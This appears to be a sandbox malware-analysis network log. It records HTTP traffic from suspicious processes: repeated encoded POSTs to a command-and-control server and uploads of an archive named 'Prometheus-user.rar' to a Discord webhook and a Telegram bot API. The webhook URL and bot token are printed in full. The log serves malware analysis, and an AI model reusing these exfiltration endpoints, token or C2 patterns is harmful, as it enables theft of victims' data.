                                                                  Aug 1, 2024 04:29:04.300242901 CEST2512OUTData Raw: 5d 52 5c 57 5a 41 57 5b 5e 5a 5a 56 50 5f 50 5a 55 56 5c 51 54 5e 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]R\WZAW[^ZZVP_PZUV\QT^Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%< %S#X=3!=<#++( 3=-#=<+**44809^/.]+'
                                                                  Aug 1, 2024 04:29:04.723057032 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:29:04.850946903 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:04 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.449787194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:29:04.974018097 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:29:05.331149101 CEST2512OUTData Raw: 5d 51 5c 56 5f 43 52 5d 5e 5a 5a 56 50 56 50 50 55 54 5c 51 54 5e 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]Q\V_CR]^ZZVPVPPUT\QT^ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%)37<Y= "^)<Q"8/+;Y0=97.?<:_ 7$9^/.]+
                                                                  Aug 1, 2024 04:29:05.793731928 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:29:05.977181911 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:05 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.449788194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:29:06.190058947 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:29:06.978975058 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:29:16.986957073 CEST166INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:06 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Aug 1, 2024 04:29:23.456589937 CEST2512OUTData Raw: 58 55 5c 57 5f 44 57 58 5e 5a 5a 56 50 5b 50 51 55 55 5c 5f 54 5a 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XU\W_DWX^ZZVP[PQUU\_TZZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?-!?'= &^=<!5('^0% >(*!_#7&-9^/.]+7


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449747162.159.136.2324436828C:\ProgramData\Microsoft\based.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-08-01 02:28:08 UTC302OUTPOST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1
                                                                  Host: discord.com
                                                                  Accept-Encoding: identity
                                                                  Content-Length: 761014
                                                                  User-Agent: python-urllib3/2.2.2
                                                                  Content-Type: multipart/form-data; boundary=ae617a8a1c033a753623c0f68de035b0
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: 2d 2d 61 65 36 31 37 61 38 61 31 63 30 33 33 61 37 35 33 36 32 33 63 30 66 36 38 64 65 30 33 35 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 a9 1d ba 09 21 04 00 00 01 0f e2 71 38 3a bd e9 e2 94 0c 58 bd d8 68 08 3f 4c 28 e3 13 6a 65 83 dc 53 13 a9 35 40 28 62 92 8d d1 e9 06 21 68 73 bc 3b 3c 5d f0 f5 98 2c 57 07 f8 4d 77 e6 6f a1 0b 02 e9 94 07 91 60 6f 3a b2 31 8b 31 7d e7 10 b5 dc a8 85 0f 7c 17 0a a4 95 7b
                                                                  Data Ascii: --ae617a8a1c033a753623c0f68de035b0Content-Disposition: form-data; name="file"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!!q8:Xh?L(jeS5@(b!hs;<],WMwo`o:11}|{
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: ca f1 a7 f0 44 7b 5d 14 09 9c 66 70 2f 68 d3 8f df cc db c4 25 98 96 25 58 76 ae ae db 27 4c 70 68 76 21 d6 71 14 d3 54 cb c3 8d 22 15 ec f6 1b 75 a2 ab 7d cd 09 ca 93 a9 bf a2 08 68 26 0a 2b 0d b4 71 19 9e 9b a1 97 12 a3 df c7 7d d2 78 63 e3 eb bb b5 ae 31 d1 ae 35 5e 2f 15 6b a4 ee db da f6 f1 d6 03 89 72 61 46 7f 54 40 af 99 52 6b 68 51 22 e3 2f c8 59 a8 39 64 a7 2c f8 e7 71 06 0f b9 59 cb da 8f 06 bf 85 d6 a1 f9 78 3d b9 ed 9e ca 04 5e 60 e1 ac 50 fc c5 00 32 40 71 ec ec 5d ad 08 8f de bc 98 47 1c b5 9b dd a9 e6 ed ee cf 4d 58 7f 3b 3b 7d 2a 38 98 86 0f bc d9 c9 a3 24 2d e2 98 d7 16 fa 33 aa 9c 2f 1e 14 23 6e bb 82 be 6b bc ef 7e 17 e2 6e 40 8c 91 6a 30 bc 0d 58 5f 8c 74 dc 86 c6 e4 9b f5 9e 69 47 f2 79 61 f1 e3 e0 e4 6d e4 6a b2 13 68 b2 e0 01 eb 69
                                                                  Data Ascii: D{]fp/h%%Xv'Lphv!qT"u}h&+q}xc15^/kraFT@RkhQ"/Y9d,qYx=^`P2@q]GMX;;}*8$-3/#nk~n@j0X_tiGyamjhi
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: 82 64 67 58 9b 3a be 15 50 4b ab ca c0 64 42 24 12 3d 13 76 ce 38 7f b4 ca 67 55 58 e6 f3 52 52 fb bc 0c 60 49 a6 bf 3c 27 89 96 3f 83 b7 d8 14 94 94 65 6f fe c3 db e1 87 b5 33 1f 7d 38 9f 15 78 54 84 6c c9 1e e5 1a 78 3e 63 e9 f1 5c b5 52 55 fa a3 dd 20 5e cc 4e b1 d5 6f a6 83 ca 6b a7 f6 26 f2 16 b4 82 2c fd c7 fd a6 40 02 f2 9b 50 ee 05 8c 62 6a 3b 9d 9c 83 f7 ee c7 0f 6f e3 16 5e c6 56 fb 1a fa 71 c5 bf 6c 47 a9 f5 c1 ca 79 44 11 dc 39 bc 84 1c 63 3a c3 e5 bb fd 50 24 72 b3 59 c5 fd 8e be aa 84 70 19 e5 8e 80 ba 80 44 3c 22 4b 3e 0a b8 aa e1 7c b0 9c cf 08 f7 ea a8 b7 5d 53 b4 74 24 e9 3b 83 70 e1 d7 47 38 87 20 18 c2 91 f7 b1 e6 85 0f f7 2c af 01 b7 e9 79 72 0a 6b ac f0 e3 2b 3f e5 c6 cd ac c5 74 72 8e bc 24 39 28 29 99 c2 33 1e a6 42 90 2a 2d 9b 22
                                                                  Data Ascii: dgX:PKdB$=v8gUXRR`I<'?eo3}8xTlx>c\RU ^Nok&,@Pbj;o^VqlGyD9c:P$rYpD<"K>|]St$;pG8 ,yrk+?tr$9()3B*-"
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: 5c 55 d5 ec ab 08 b0 9b 00 2e 2e b2 89 4c db c4 87 47 d5 26 56 16 de 1c f5 0c 5b 23 91 fb c7 3b 2c c6 f8 e1 69 a8 58 22 ed e2 f8 5b 70 4b 76 6c fe fb 1d cb 99 ec 16 6b 40 f3 bc 97 eb a7 01 c5 86 9a bb 9c 6e db ce 52 c0 06 30 1a df 53 67 2f d2 e3 03 8c 33 3b ec 2a 47 d8 f8 87 cc 95 dc 17 d5 c3 5e d2 37 55 1a 7a 8a b1 78 fc 5b b8 d5 5e ee 73 83 a0 a6 84 e8 fc d6 52 e8 b8 fb 6a 57 5b 39 de 35 14 f1 b0 95 b6 7e 04 15 27 97 84 c9 13 51 e1 80 d0 51 63 56 2d 23 69 0a 34 2c 17 9c 35 a7 07 71 4c 11 e8 23 cc 8f ec 91 24 f2 6a 54 c7 98 e9 02 99 fc b6 23 f7 ba c0 21 58 58 a4 0b 66 a1 94 73 34 87 f2 6a 4b 10 71 a5 80 f5 5f fb 4d 0a 30 3b f3 7e c8 98 d2 ef eb 9a d9 5a ab ed ad 1b a9 d6 58 ff 43 8e 36 98 48 71 30 1c 67 5e 02 8b f8 d4 74 6b dd d4 21 ad c8 9b 42 3a ba 03
                                                                  Data Ascii: \U..LG&V[#;,iX"[pKvlk@nR0Sg/3;*G^7Uzx[^sRjW[95~'QQcV-#i4,5qL#$jT#!XXfs4jKq_M0;~ZXC6Hq0g^tk!B:
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: a2 a5 09 83 16 4e 0d c8 2f fc 6c 23 8b 61 04 0b 92 72 3d 64 1e 90 38 d6 78 71 60 8b b9 19 c8 de c2 4c 96 b0 94 ac 76 d2 9b 3c 88 f9 ed 1f 76 b6 1f a8 20 94 0c a4 36 1c f0 a5 91 ff 4b d7 1b 17 35 7f bf c7 c1 98 ac 55 6b c3 c8 c8 f5 5c 3a 43 b2 84 f5 dd c6 08 b1 de 24 26 c2 e4 8a ee 78 2c 3f 7c af 74 6a 60 3f 49 cf c7 95 4c 16 d1 69 ec 69 e9 19 1f a3 53 bb d9 f7 8e 32 72 59 a2 1b 85 9f 79 8d 05 1a e3 ae 1a cd 1a 0a e8 f0 2e 8d 94 24 21 b4 a1 d8 fb 2f ab e8 31 c6 01 73 9e 2a c1 27 27 fe 71 c5 11 f3 ac 78 d7 06 13 2d f6 4a 5d 7e 83 5a 52 3d 7e 2b 28 c9 3c 53 ca bb a9 c1 59 42 5a 2d dd 19 b2 44 ff 18 10 3b 2c 91 d0 f4 13 89 52 96 c9 0b 80 79 84 20 98 7b d9 d4 e6 c7 76 1a e3 ba 4f f5 7d aa d1 e3 87 6f 31 f4 b6 84 19 51 6e 97 f4 08 28 29 ce 28 69 9b 02 2e 68 e9
                                                                  Data Ascii: N/l#ar=d8xq`Lv<v 6K5Uk\:C$&x,?|tj`?ILiiS2rYy.$!/1s*''qx-J]~ZR=~+(<SYBZ-D;,Ry {vO}o1Qn()(i.h
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: 69 6d 59 26 99 13 95 6b f3 ae 5f 7e aa ae 73 c8 96 07 2b 8c fb 64 0e 57 a3 f8 b9 40 83 b0 04 c4 d0 c1 68 15 10 f2 bf 37 59 2d 2e 6b d6 b9 f6 82 0c 06 d2 7d 16 4d 29 e2 6a c1 6e a9 fa 7d 6c 3a 6b 37 1c a9 e6 39 6b 39 df f6 40 ad 83 76 52 86 e9 b1 5b 69 de e5 7d 08 7e 35 dc 1f b0 0a 2b 04 3d 7d 8a 8c 11 c0 a7 af 74 f4 87 23 b7 c0 87 53 4a 15 41 e7 d7 a8 1d 4f b5 c8 c0 b5 0e 20 53 64 37 6d 85 36 d7 ff 15 27 0f 58 0e e3 25 52 1e 7b 82 66 f0 4c f4 a3 0f e6 19 97 14 24 42 fb aa af 55 33 fd 85 e9 bc ee e1 50 32 00 a9 0c 77 d7 34 3d 8d 12 eb d8 34 18 56 e3 e2 d7 33 df 33 85 d4 83 12 d9 55 86 44 9f f4 f5 f7 f7 b6 9c af ae fb fb 68 14 09 d0 7e 7c ac b2 41 5b 80 a5 99 9e f7 ad 7b 31 7a 88 c6 3c 36 dc 37 82 47 df 11 f7 d3 23 e9 c0 80 83 0a f9 bb 8e 9d 7c 3c af 30 96
                                                                  Data Ascii: imY&k_~s+dW@h7Y-.k}M)jn}l:k79k9@vR[i}~5+=}t#SJAO Sd7m6'X%R{fL$BU3P2w4=4V33UDh~|A[{1z<67G#|<0
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: 47 3f 80 da e1 00 b3 14 ad 9e e8 71 26 7a d9 de 9a bc 20 9e f1 da 20 48 da 59 54 ab 6e 10 95 a9 d0 fa c4 00 12 27 9c d2 3f 3c ec c1 1d d6 6c 54 72 df b3 a0 8e 9c 0b 68 39 e4 c4 f1 e3 c6 4f d5 83 43 26 da b8 11 40 e0 90 f3 9e 7c 4a fe 20 f0 4e 81 d4 47 5e 70 e2 84 a8 28 76 00 65 08 63 b5 b3 15 e5 e2 7c 8d 24 e2 21 35 1e 6d 6d 5a 2d d1 18 5e b3 cf 73 e5 64 93 b8 38 52 67 76 f9 2f ca 28 cb f6 96 28 80 72 3c b0 ed da 86 39 34 d3 fe 79 e0 a3 0c 8f a8 d2 c6 fb 9b d7 30 53 eb f6 07 82 22 80 e2 4c 21 34 e9 bd b6 54 0c e9 44 ed 5b 7e 19 12 96 ac f2 52 54 78 81 c3 02 4c d4 69 ac e5 16 bc 70 ee 76 f3 98 54 43 b1 9d 54 83 eb 0f 5b 48 20 27 6f 2f f6 e2 00 f4 12 c5 3e 4c 35 cd 7e 57 4f 83 bc 60 7c 1d cd 55 c9 b9 d3 41 30 81 a8 90 3d 5d 1f 15 a3 50 12 a2 bf e4 3a 41 74
                                                                  Data Ascii: G?q&z HYTn'?<lTrh9OC&@|J NG^p(vec|$!5mmZ-^sd8Rgv/((r<94y0S"L!4TD[~RTxLipvTCT[H 'o/>L5~WO`|UA0=]P:At
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: fd c9 17 f6 e8 36 ff 81 50 da 24 6c 71 4d 73 1a bd d2 d2 25 c5 2e 4f 5f 34 d9 09 b2 5b 33 3b 5b 41 6f 92 b8 9c 4f 3a ee 45 cc 51 4a 83 f0 5e 3e 37 46 37 e2 43 18 6e 88 b4 ea f2 1d bd e6 f5 2b 5d 66 78 36 fa 65 bb 84 21 d9 be ef 2f cf 23 fe 9f 71 f7 f5 5a f8 4f 80 84 4d 2f bc 02 cc 94 6f e4 ab c8 11 d3 ac 9c 1b 55 74 58 62 95 3e 6e 93 c8 45 95 16 b3 78 a6 24 45 de 8e 4b 34 ed de 09 6b c3 6d dc 66 c9 67 b4 e0 ed 41 a4 df 2d 8a 86 c8 cf e6 38 55 41 e8 16 75 08 1a 71 5b 68 ca 97 86 95 b8 19 9c 90 6f cf 43 91 6b e2 71 70 6b 00 ac 65 6c 13 0c 2e 87 1d 65 fb b0 8f 26 6e 19 f9 2d ed b8 df a8 3f 2a 6a b2 e5 f9 a7 a2 47 bb 7e de 09 8e 82 cb cf 25 89 93 59 34 b0 18 9c de 7d 4e 45 95 80 1e bd 8f 76 b3 98 ec 9c 75 87 0d 11 1d cf 2b 42 28 74 ee 3f 73 31 b3 d0 d3 a9 f7
                                                                  Data Ascii: 6P$lqMs%.O_4[3;[AoO:EQJ^>7F7Cn+]fx6e!/#qZOM/oUtXb>nEx$EK4kmfgA-8UAuq[hoCkqpkel.e&n-?*jG~%Y4}NEvu+B(t?s1
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: 0e a8 63 d6 56 a6 0e 10 56 d6 3b 3f 03 ad d7 9d 67 5d c0 46 3c 1d 0b c0 90 c3 93 dd ba da 19 dd 7b c8 6b 3e 00 d0 ea 21 17 51 21 83 b8 5d 78 9e 83 10 2f d4 83 d0 2d 46 c8 a4 e5 83 8b b9 63 c7 e2 a9 38 f7 7c 63 a6 9f 88 13 94 db f4 a2 6a 28 19 be 00 19 f8 83 f8 c8 b9 01 2e 95 13 ae 4c e1 37 6d d4 95 4b 4f d2 f7 07 22 e7 a2 ce 02 25 2f d9 54 a9 a9 9e 3a 8e 4f a9 0f f2 b0 98 2d 3e c8 78 7f ff 66 a9 e6 d0 58 5e f2 ed 99 bb 88 7f f1 fa 75 93 50 37 8b 01 a3 28 9f 29 4b 9a 8c 8a e9 ad d5 2b 73 a5 4d f0 1d 3d d2 97 9e 10 3b 7f ac ac 09 80 91 ca d3 4a ef 3a d0 68 fa 2d 05 d1 b7 4d 6f 9a 12 c6 9c d2 f6 76 a1 cd 52 20 bb 9b 06 fb 7b da 31 34 10 2d ae 51 87 82 aa cd 8a 5e 40 d5 0f cc b4 0c fe 03 d4 36 c0 5b 43 12 1e 4d 88 89 a2 e6 c4 b1 80 07 73 04 66 04 91 52 56 15
                                                                  Data Ascii: cVV;?g]F<{k>!Q!]x/-Fc8|cj(.L7mKO"%/T:O->xfX^uP7()K+sM=;J:h-MovR {14-Q^@6[CMsfRV
                                                                  2024-08-01 02:28:08 UTC16384OUTData Raw: f3 d6 c8 e8 03 5b a4 36 03 6d f8 45 e4 5c 93 c3 88 32 e4 e2 7e 89 18 8a 34 0b 0b 09 fa fb 88 d7 30 c3 91 1c 01 c9 f4 db 36 7c 05 01 31 b3 21 02 3d cf 35 ca 33 ff ed 14 d7 c1 94 ff 1d b9 f5 87 94 26 6e 00 b1 2d 0f 60 c2 77 6c ee 6d e1 7e c0 39 99 87 ac 0d 43 c7 fb 29 8f a2 c7 a8 43 42 8c 6d e6 63 cc b1 a2 af d6 cf 24 73 ac 6e a3 d7 6c db b0 c3 a7 21 5e 1e cc ae a5 6a 11 76 9e d8 c4 2a 8d 2a a3 79 d8 f1 6d 3b 6f bd b6 2d 4f b1 71 b6 d7 90 81 31 76 ab 64 d4 c3 b4 3a 31 af 9d c5 f9 63 d1 52 17 c6 23 b0 16 15 a8 bc 51 2a cd af 38 f2 3f 45 7c 70 c0 d4 ae 24 d3 17 87 6c 8b 40 e2 57 f4 37 f6 61 8b 75 9e f0 6c 00 c2 82 73 2b 2b d9 56 ce d8 bb 7d 4f 26 c2 8c 96 d0 6e 12 b5 53 da eb f3 6d df 59 d5 de b1 e3 41 98 57 6f 6c 33 5b 9e 45 1a 27 7f f0 9a c3 ec d2 27 bb 37
                                                                  Data Ascii: [6mE\2~406|1!=53&n-`wlm~9C)CBmc$snl!^jv**ym;o-Oq1vd:1cR#Q*8?E|p$l@W7auls++V}O&nSmYAWol3[E''7
                                                                  2024-08-01 02:28:09 UTC1363INHTTP/1.1 404 Not Found
                                                                  Date: Thu, 01 Aug 2024 02:28:09 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 45
                                                                  Connection: close
                                                                  set-cookie: __dcfduid=b151a2c64fad11ef8beb969bb34c99ef; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                  x-ratelimit-limit: 5
                                                                  x-ratelimit-remaining: 4
                                                                  x-ratelimit-reset: 1722479290
                                                                  x-ratelimit-reset-after: 1
                                                                  via: 1.1 google
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2C1ydocOQ2xMnFPXwJ2xVHefN1DwZxzUkt2yGnLAoV7iE5WV0r3QSdBKpqiNDNqOhMPa%2BBjzZBcJFV%2BK2fq8nEamAve7E2UQCVSILjZ9873ZF8SlAKmdavBLDQY"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                  Set-Cookie: __sdcfduid=b151a2c64fad11ef8beb969bb34c99ef78f5274c8378281a77dc6bf9633760fb25a9feef22631a2c005696eb41e4adde; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                  Set-Cookie: __cfruid=3d905955f4beffde0eab7938151d2b1d8621eb2e-1722479289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449748149.154.167.2204436828C:\ProgramData\Microsoft\based.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-08-01 02:28:10 UTC268OUTPOST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1
                                                                  Host: api.telegram.org
                                                                  Accept-Encoding: identity
                                                                  Content-Length: 760854
                                                                  User-Agent: python-urllib3/2.2.2
                                                                  Content-Type: multipart/form-data; boundary=ae238c8c91c4161f55fc64918e1aaa2d
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 2d 2d 61 65 32 33 38 63 38 63 39 31 63 34 31 36 31 66 35 35 66 63 36 34 39 31 38 65 31 61 61 61 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 a9 1d ba 09 21 04 00 00 01 0f e2 71 38 3a bd e9 e2 94 0c 58 bd d8 68 08 3f 4c 28 e3 13 6a 65 83 dc 53 13 a9 35 40 28 62 92 8d d1 e9 06 21 68 73 bc 3b 3c 5d f0 f5 98 2c 57 07 f8 4d 77 e6 6f a1 0b 02 e9 94 07 91 60 6f 3a b2 31 8b 31 7d e7 10 b5 dc a8 85 0f 7c 17
                                                                  Data Ascii: --ae238c8c91c4161f55fc64918e1aaa2dContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!!q8:Xh?L(jeS5@(b!hs;<],WMwo`o:11}|
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 2e 87 e9 26 ca f1 a7 f0 44 7b 5d 14 09 9c 66 70 2f 68 d3 8f df cc db c4 25 98 96 25 58 76 ae ae db 27 4c 70 68 76 21 d6 71 14 d3 54 cb c3 8d 22 15 ec f6 1b 75 a2 ab 7d cd 09 ca 93 a9 bf a2 08 68 26 0a 2b 0d b4 71 19 9e 9b a1 97 12 a3 df c7 7d d2 78 63 e3 eb bb b5 ae 31 d1 ae 35 5e 2f 15 6b a4 ee db da f6 f1 d6 03 89 72 61 46 7f 54 40 af 99 52 6b 68 51 22 e3 2f c8 59 a8 39 64 a7 2c f8 e7 71 06 0f b9 59 cb da 8f 06 bf 85 d6 a1 f9 78 3d b9 ed 9e ca 04 5e 60 e1 ac 50 fc c5 00 32 40 71 ec ec 5d ad 08 8f de bc 98 47 1c b5 9b dd a9 e6 ed ee cf 4d 58 7f 3b 3b 7d 2a 38 98 86 0f bc d9 c9 a3 24 2d e2 98 d7 16 fa 33 aa 9c 2f 1e 14 23 6e bb 82 be 6b bc ef 7e 17 e2 6e 40 8c 91 6a 30 bc 0d 58 5f 8c 74 dc 86 c6 e4 9b f5 9e 69 47 f2 79 61 f1 e3 e0 e4 6d e4 6a b2 13 68 b2
                                                                  Data Ascii: .&D{]fp/h%%Xv'Lphv!qT"u}h&+q}xc15^/kraFT@RkhQ"/Y9d,qYx=^`P2@q]GMX;;}*8$-3/#nk~n@j0X_tiGyamjh
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: db 63 eb 5c 82 64 67 58 9b 3a be 15 50 4b ab ca c0 64 42 24 12 3d 13 76 ce 38 7f b4 ca 67 55 58 e6 f3 52 52 fb bc 0c 60 49 a6 bf 3c 27 89 96 3f 83 b7 d8 14 94 94 65 6f fe c3 db e1 87 b5 33 1f 7d 38 9f 15 78 54 84 6c c9 1e e5 1a 78 3e 63 e9 f1 5c b5 52 55 fa a3 dd 20 5e cc 4e b1 d5 6f a6 83 ca 6b a7 f6 26 f2 16 b4 82 2c fd c7 fd a6 40 02 f2 9b 50 ee 05 8c 62 6a 3b 9d 9c 83 f7 ee c7 0f 6f e3 16 5e c6 56 fb 1a fa 71 c5 bf 6c 47 a9 f5 c1 ca 79 44 11 dc 39 bc 84 1c 63 3a c3 e5 bb fd 50 24 72 b3 59 c5 fd 8e be aa 84 70 19 e5 8e 80 ba 80 44 3c 22 4b 3e 0a b8 aa e1 7c b0 9c cf 08 f7 ea a8 b7 5d 53 b4 74 24 e9 3b 83 70 e1 d7 47 38 87 20 18 c2 91 f7 b1 e6 85 0f f7 2c af 01 b7 e9 79 72 0a 6b ac f0 e3 2b 3f e5 c6 cd ac c5 74 72 8e bc 24 39 28 29 99 c2 33 1e a6 42 90
                                                                  Data Ascii: c\dgX:PKdB$=v8gUXRR`I<'?eo3}8xTlx>c\RU ^Nok&,@Pbj;o^VqlGyD9c:P$rYpD<"K>|]St$;pG8 ,yrk+?tr$9()3B
